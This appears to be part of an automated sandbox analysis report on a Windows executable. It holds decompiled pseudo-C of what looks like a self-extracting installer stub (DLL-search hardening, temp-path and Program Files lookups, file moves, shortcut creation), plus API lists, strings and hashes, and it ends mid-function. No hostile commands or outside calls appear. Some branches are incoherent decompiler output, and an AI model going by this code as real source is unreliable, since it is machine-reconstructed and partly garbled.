					_t197 = E00D96662(_t185, _t118);
					_pop(_t185);
					if(_t197 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4868, 0x800);
					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
						L13:
						CloseHandle(_t206);
						_t202 = 0x800;
						goto L14;
					} else {
						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
						_t222 = _t167;
						if(_t167 == 0) {
							goto L13;
						}
						_t185 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t198 = E00D7F835(_t222);
							_t223 = _t198;
							if(_t198 == 0) {
								goto L13;
							}
							E00D7FCFD( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t198);
						}
						goto L13;
					}
				}
				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
				_t184 = _a46032;
				if(_t176 != 0) {
					asm("sbb ecx, ecx");
					_t185 =  ~(_t184 & 0x000000ff) & 0x00da22e4;
					 *_t176( ~(_t184 & 0x000000ff) & 0x00da22e4);
				}
				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
				if(_t177 != 0) {
					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					_v1 = 1;
				}
				goto L5;
			}























              0x00d7fd4e
              0x00d7fd54
              0x00d7fd5c
              0x00d7fd67
              0x00d7fd6b
              0x00d7fdbe
              0x00d7fdbe
              0x00d7fdc3
              0x00d7fdcc
              0x00d7fdd1
              0x00d7fdd9
              0x00d7fde4
              0x00d7fdec
              0x00d7fdf4
              0x00d7fdfc
              0x00d7fe04
              0x00d7fe0c
              0x00d7fe14
              0x00d7fe1c
              0x00d7fe24
              0x00d7fe2c
              0x00d7fe34
              0x00d7fe3c
              0x00d7fe44
              0x00d7fe4c
              0x00d7fe54
              0x00d7fe5c
              0x00d7fe64
              0x00d7fe6c
              0x00d7fe74
              0x00d7fe7c
              0x00d7fe84
              0x00d7fe8c
              0x00d7fe94
              0x00d7fe9c
              0x00d7fea4
              0x00d7feaf
              0x00d7feba
              0x00d7fec5
              0x00d7fed0
              0x00d7fedb
              0x00d7fee6
              0x00d7fef1
              0x00d7fefc
              0x00d7ff07
              0x00d7ff12
              0x00d7ff1d
              0x00d7ff28
              0x00d7ff33
              0x00d7ff3e
              0x00d7ff49
              0x00d7ff54
              0x00d7ff5f
              0x00d7ff6a
              0x00d7ff75
              0x00d7ff80
              0x00d7ff8b
              0x00d7ff96
              0x00d7ffa1
              0x00d7ffac
              0x00d7ffb7
              0x00d7ffc2
              0x00d7ffcd
              0x00d7ffd8
              0x00d7ffe3
              0x00d7ffee
              0x00d7fff9
              0x00d80004
              0x00d8000f
              0x00d8001a
              0x00d80025
              0x00d800f3
              0x00d800fe
              0x00d80117
              0x00d80122
              0x00d80124
              0x00d80126
              0x00d80130
              0x00d8013d
              0x00d8013d
              0x00d80132
              0x00d80136
              0x00d80136
              0x00d80141
              0x00d80163
              0x00d80163
              0x00d80174
              0x00d80181
              0x00d80185
              0x00d8018f
              0x00d80193
              0x00d80198
              0x00d801cc
              0x00d801cc
              0x00d801ce
              0x00d802e5
              0x00d802e5
              0x00d801dc
              0x00d801eb
              0x00d8025a
              0x00d80262
              0x00d80276
              0x00d8027b
              0x00d8027e
              0x00d80284
              0x00d80286
              0x00d8028f
              0x00d802a4
              0x00d802bc
              0x00d802c7
              0x00d802cd
              0x00d802cd
              0x00d801ed
              0x00d801f2
              0x00d801fc
              0x00d80208
              0x00d80210
              0x00d8022a
              0x00d8022f
              0x00d80249
              0x00d80249
              0x00d802d5
              0x00d802d5
              0x00d8019a
              0x00d8019c
              0x00d8019c
              0x00d801ad
              0x00d801ba
              0x00d801be
              0x00000000
              0x00000000
              0x00d801c0
              0x00d801c4
              0x00000000
              0x00000000
              0x00000000
              0x00d801c6
              0x00d801c8
              0x00000000
              0x00d801c8
              0x00d80143
              0x00d80158
              0x00d8015e
              0x00d80161
              0x00000000
              0x00000000
              0x00000000
              0x00d80161
              0x00d80187
              0x00d80187
              0x00d80188
              0x00000000
              0x00d8018d
              0x00d80031
              0x00d80033
              0x00d80036
              0x00000000
              0x00000000
              0x00d80047
              0x00d80065
              0x00d80069
              0x00d800e7
              0x00d800e8
              0x00d800ee
              0x00000000
              0x00d8007b
              0x00d80090
              0x00d80096
              0x00d80098
              0x00000000
              0x00000000
              0x00d800a0
              0x00d800a2
              0x00d800a7
              0x00d800b6
              0x00d800be
              0x00d800dc
              0x00d800e1
              0x00d800e3
              0x00d800e5
              0x00000000
              0x00000000
              0x00d800c9
              0x00d800ce
              0x00d800da
              0x00d800db
              0x00d800db
              0x00000000
              0x00d800dc
              0x00d80069
              0x00d7fd79
              0x00d7fd7b
              0x00d7fd84
              0x00d7fd8b
              0x00d7fd8d
              0x00d7fd94
              0x00d7fd94
              0x00d7fd9c
              0x00d7fda0
              0x00d7fdb0
              0x00d7fdb7
              0x00d7fdb9
              0x00d7fdb9
              0x00000000

              APIs
              • GetModuleHandleW.KERNEL32 ref: 00D7FD61
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D7FD79
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D7FD9C
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D80047
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D8005F
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D80071
              • ReadFile.KERNEL32(00000000,?,00007FFE,00DA28D4,00000000), ref: 00D80090
              • CloseHandle.KERNEL32(00000000), ref: 00D800E8
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D800FE
              • CompareStringW.KERNELBASE(00000400,00001001,00DA2920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D80158
              • GetFileAttributesW.KERNELBASE(?,?,00DA28EC,00000800,?,00000000,?,00000800), ref: 00D80181
              • GetFileAttributesW.KERNEL32(?,?,00DA29AC,00000800), ref: 00D801BA
                • Part of subcall function 00D7FCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D7FD18
                • Part of subcall function 00D7FCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D7E7F6,Crypt32.dll,?,00D7E878,?,00D7E85C,?,?,?,?), ref: 00D7FD3A
              • _swprintf.LIBCMT ref: 00D8022A
              • _swprintf.LIBCMT ref: 00D80276
                • Part of subcall function 00D73E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73E54
              • AllocConsole.KERNEL32 ref: 00D8027E
              • GetCurrentProcessId.KERNEL32 ref: 00D80288
              • AttachConsole.KERNEL32(00000000), ref: 00D8028F
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D802B5
              • WriteConsoleW.KERNEL32(00000000), ref: 00D802BC
              • Sleep.KERNEL32(00002710), ref: 00D802C7
              • FreeConsole.KERNEL32 ref: 00D802CD
              • ExitProcess.KERNEL32 ref: 00D802D5
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752
              • Opcode ID: 964f3e289c5979d249753bd3ece90bb48f152e982e61abd2a822c837d07f7542
              • Instruction ID: db597da9f2c56bbf200a63bd1078386209990412b7a5334b902e7cd8824dc7ac
              • Opcode Fuzzy Hash: 964f3e289c5979d249753bd3ece90bb48f152e982e61abd2a822c837d07f7542
              • Instruction Fuzzy Hash: 9DD190B1048384AFD731EF5AC849BAFBBE8EB86714F50481CF58896340D7B08548CBB6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8B4C7, Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438windowfileCOMMON
              Download Yara Rule
              C-Code - Quality: 49%
              			E00D8B4C7(void* __edx) {
				intOrPtr _t215;
				void* _t220;
				intOrPtr _t278;
				void* _t291;
				WCHAR* _t293;
				void* _t296;
				WCHAR* _t297;
				void* _t302;

				_t291 = __edx;
				E00D8D870(E00DA150B, _t302);
				_t215 = 0x1bc80;
				E00D8D940();
				if( *((intOrPtr*)(_t302 + 0xc)) == 0) {
					L169:
					 *[fs:0x0] =  *((intOrPtr*)(_t302 - 0xc));
					return _t215;
				}
				_push(0x1000);
				_push(_t302 - 0xe);
				_push(_t302 - 0xd);
				_push(_t302 - 0x5c84);
				_push(_t302 - 0xfc8c);
				_push( *((intOrPtr*)(_t302 + 0xc)));
				_t215 = E00D8A156();
				 *((intOrPtr*)(_t302 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t278 =  *((intOrPtr*)(_t302 + 0x10));
					do {
						_t220 = _t302 - 0x5c84;
						_t296 = _t302 - 0x1bc8c;
						_t293 = 6;
						goto L4;
						L6:
						while(E00D81410(_t302 - 0xfc8c,  *((intOrPtr*)(0xdad618 + _t297 * 4))) != 0) {
							_t297 =  &(_t297[0]);
							if(_t297 < 0xe) {
								continue;
							} else {
								goto L167;
							}
						}
						if(_t297 > 0xd) {
							goto L167;
						}
						switch( *((intOrPtr*)(_t297 * 4 +  &M00D8C0D7))) {
							case 0:
								__eflags = _t278 - 2;
								if(_t278 != 2) {
									goto L167;
								}
								_t299 = 0x800;
								E00D895F8(_t302 - 0x7c84, 0x800);
								E00D7A188(E00D7B625(_t302 - 0x7c84, _t302 - 0x5c84, _t302 - 0xdc8c, 0x800), _t278, _t302 - 0x8c8c, 0x800);
								 *(_t302 - 4) = _t293;
								E00D7A2C2(_t302 - 0x8c8c, _t302 - 0xdc8c);
								E00D76EF9(_t302 - 0x3c84);
								_push(_t293);
								_t286 = _t302 - 0x8c8c;
								_t238 = E00D7A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
								__eflags = _t238;
								if(_t238 == 0) {
									L28:
									 *(_t302 - 4) =  *(_t302 - 4) | 0xffffffff;
									E00D7A19E(_t302 - 0x8c8c);
									goto L167;
								} else {
									goto L15;
									L16:
									E00D7B1B7(_t286, __eflags, _t302 - 0x7c84, _t302 - 0x103c, _t299);
									E00D7AEA5(__eflags, _t302 - 0x103c, _t299);
									_t301 = E00D92B33(_t302 - 0x7c84);
									__eflags = _t301 - 4;
									if(_t301 < 4) {
										L18:
										_t266 = E00D7B5E5(_t302 - 0x5c84);
										__eflags = _t266;
										if(_t266 != 0) {
											goto L28;
										}
										L19:
										_t268 = E00D92B33(_t302 - 0x3c84);
										__eflags = 0;
										 *((short*)(_t302 + _t268 * 2 - 0x3c82)) = 0;
										E00D8E920(_t293, _t302 - 0x3c, _t293, 0x1e);
										_t304 = _t304 + 0x10;
										 *((intOrPtr*)(_t302 - 0x38)) = 3;
										_push(0x14);
										_pop(_t271);
										 *((short*)(_t302 - 0x2c)) = _t271;
										 *((intOrPtr*)(_t302 - 0x34)) = _t302 - 0x3c84;
										_push(_t302 - 0x3c);
										 *0xdadef4();
										goto L20;
									}
									_t276 = E00D92B33(_t302 - 0x103c);
									__eflags = _t301 - _t276;
									if(_t301 > _t276) {
										goto L19;
									}
									goto L18;
									L20:
									_t243 = GetFileAttributesW(_t302 - 0x3c84);
									__eflags = _t243 - 0xffffffff;
									if(_t243 == 0xffffffff) {
										L27:
										_push(_t293);
										_t286 = _t302 - 0x8c8c;
										_t245 = E00D7A215(_t302 - 0x8c8c, _t291, _t302 - 0x3c84);
										__eflags = _t245;
										if(_t245 != 0) {
											_t299 = 0x800;
											L15:
											SetFileAttributesW(_t302 - 0x3c84, _t293);
											__eflags =  *((char*)(_t302 - 0x2c78));
											if(__eflags == 0) {
												goto L20;
											}
											goto L16;
										}
										goto L28;
									}
									_t247 = DeleteFileW(_t302 - 0x3c84);
									__eflags = _t247;
									if(_t247 != 0) {
										goto L27;
									} else {
										_t300 = _t293;
										_push(_t293);
										goto L24;
										L24:
										E00D73E41(_t302 - 0x103c, 0x800, L"%s.%d.tmp", _t302 - 0x3c84);
										_t304 = _t304 + 0x14;
										_t252 = GetFileAttributesW(_t302 - 0x103c);
										__eflags = _t252 - 0xffffffff;
										if(_t252 != 0xffffffff) {
											_t300 = _t300 + 1;
											__eflags = _t300;
											_push(_t300);
											goto L24;
										} else {
											_t255 = MoveFileW(_t302 - 0x3c84, _t302 - 0x103c);
											__eflags = _t255;
											if(_t255 != 0) {
												MoveFileExW(_t302 - 0x103c, _t293, 4);
											}
											goto L27;
										}
									}
								}
							case 1:
								__eflags = __ebx;
								if(__ebx == 0) {
									__eax = E00D92B33(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0xdcce0c);
									__eax = E00D92B5E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax != 0) {
										 *0xdcce0c = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										__eax = E00D966ED(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
									}
									__eflags = __bh;
									if(__bh == 0) {
										__eax = L00D92B4E(__esi);
									}
								}
								goto L167;
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L167;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L167;
								}
								__eflags =  *0xdb9602 - __di;
								if( *0xdb9602 != __di) {
									goto L167;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E00D92B33(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L167;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L54:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L66:
											__ebp - 0x103c = E00D7FAB1(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L67:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E00D90D9B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0xdb9602;
											E00D7FAB1(0xdb9602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E00D89FFC(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__ebx =  *0xdadf7c;
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xdb9602); // executed
											__eax = __ebp - 0x103c;
											__eax = E00D92B69(__ebp - 0x103c, 0xdb9602, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = 0;
												__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
											}
											goto L167;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L57:
											__eax = __ebp - 0x18;
											__ebx = 0;
											_push(__ebp - 0x18);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xdadea8();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x103c;
												_push(__ebp - 0x103c);
												__eax = __ebp - 0x1c;
												_push(__ebp - 0x1c);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x18));
												__eax =  *0xdadea4();
												_push( *(__ebp - 0x18));
												 *0xdade84() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E00D92B33(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E00D7FA89(__eflags, __ebp - 0x103c, "\\", __esi);
												}
											}
											__esi = E00D92B33(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E00D7FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L67;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L66;
										}
										goto L57;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L54;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L167;
									} else {
										__ebp - 0x103c = E00D7FAB1(__ebp - 0x103c, __edi, 0x800);
										goto L67;
									}
								}
							case 4:
								__eflags =  *0xdb95fc - 1;
								__eflags = __eax - 0xdb95fc;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L84:
									 *0xdb75d2 = __cl;
									 *0xdb75d3 = 1;
									goto L167;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xdb75d2 = __cl;
									L83:
									 *0xdb75d3 = __cl;
									goto L167;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L84;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L167;
								}
								 *0xdb75d2 = 1;
								goto L83;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L94;
								}
								__eax = __ebp - 0x5c84;
								__eax = E00D92B69(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L94;
								}
								_push(__edi);
								goto L93;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L115:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xdb95fc;
										if( *0xdb95fc == 0) {
											 *0xdb95fc = 2;
										}
										 *0xdb85f8 = 1;
									}
									goto L167;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
								E00D7AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xdad5f8);
									__ebp - 0x7c84 = E00D73E41(0xdb85fa, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E00D79E6B(0xdb85fa);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xdb85fa);
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L167;
								}
								__eflags =  *0xdc5d02;
								if( *0xdc5d02 != 0) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x143c) = __ax;
								__eax = __ebp - 0x5c84;
								_push(0x2c);
								_push(__ebp - 0x5c84);
								__eax = E00D90BB8(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L111:
									__eflags =  *(__ebp - 0x143c);
									if( *(__ebp - 0x143c) == 0) {
										__ebp - 0x1bc8c = __ebp - 0x5c84;
										E00D7FAB1(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
										__ebp - 0x143c = E00D7FAB1(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
									}
									__ebp - 0x5c84 = E00D89C4F(__ebp - 0x5c84);
									__eax = 0;
									 *(__ebp - 0x4c84) = __ax;
									__ebp - 0x143c = __ebp - 0x5c84;
									__eax = E00D89735( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L167;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0xdb75d7 = 1;
										 *0xdb85fa = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L115;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x5c84) - __dx;
								if( *(__ebp - 0x5c84) == __dx) {
									goto L111;
								}
								__ecx = 0;
								__eax = __ebp - 0x5c84;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x5c84;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x5c84 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L111;
								}
								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
								__ebp - 0x143c = E00D7FAB1(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
								goto L111;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E00D9668C(__ebx, __edi);
										_pop(__ecx);
										 *0xdcde1c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xdcde18 = E00D8A2AE(__ecx, __edx, __eflags);
								}
								 *0xdc5d03 = 1;
								goto L167;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L94:
									 *0xdcde20 = 1;
									goto L167;
								}
								_push(1);
								L93:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E00D8C431();
								goto L94;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L167;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E00D959C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0xdcad0a);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E00D7FAB1();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0xdc9d0a);
										_push(__eax);
										__eax = E00D7FAB1();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0xdcbd0a);
										_push(__eax);
										__eax = E00D7FAB1();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E00D94D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E00D79E6B(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L152;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L152;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L140:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E00D79E6B(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L148:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L149;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L146:
												_push(__eax);
												__eax = E00D94D7E();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L148;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L146;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L149;
										}
										goto L140;
										L149:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L152;
								} else {
									__ebp - 0x19c8a = __ebp - 0x6c84;
									E00D94D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
									_push(__ebx);
									_push(__ebp - 0x6c82);
									__eax = E00D90BB8(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1c3c = E00D94D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
										_pop(__ecx);
										_pop(__ecx);
									}
									L152:
									__eflags =  *(__ebp - 0x11c8c);
									__ebx = 0x800;
									if( *(__ebp - 0x11c8c) != 0) {
										_push(0x800);
										__eax = __ebp - 0x9c8c;
										_push(__ebp - 0x9c8c);
										__eax = __ebp - 0x11c8c;
										_push(__ebp - 0x11c8c);
										__eax = E00D7AED7();
									}
									_push(__ebx);
									__eax = __ebp - 0xbc8c;
									_push(__ebp - 0xbc8c);
									__eax = __ebp - 0x6c84;
									_push(__ebp - 0x6c84);
									__eax = E00D7AED7();
									__eflags =  *(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E00D8A24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
									}
									__ebp - 0x2c3c = E00D7AEA5(__eflags, __ebp - 0x2c3c, __ebx);
									__eflags =  *((short*)(__ebp - 0x17c8c));
									if(__eflags != 0) {
										__ebp - 0x17c8c = __ebp - 0x2c3c;
										E00D7FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
										__eax = E00D7AEA5(__eflags, __ebp - 0x2c3c, __ebx);
									}
									__ebp - 0x2c3c = __ebp - 0xcc8c;
									__eax = E00D94D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
									__eflags =  *(__ebp - 0x13c8c);
									__eax = __ebp - 0x13c8c;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19c8c;
									}
									__ebp - 0x2c3c = E00D7FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
									__eax = __ebp - 0x2c3c;
									__eflags = E00D7B153(__ebp - 0x2c3c);
									if(__eflags == 0) {
										L162:
										__ebp - 0x2c3c = E00D7FA89(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
										goto L163;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L163:
											_push(1);
											__eax = __ebp - 0x2c3c;
											_push(__ebp - 0x2c3c);
											E00D79D3A(__ecx, __ebp) = __ebp - 0xbc8c;
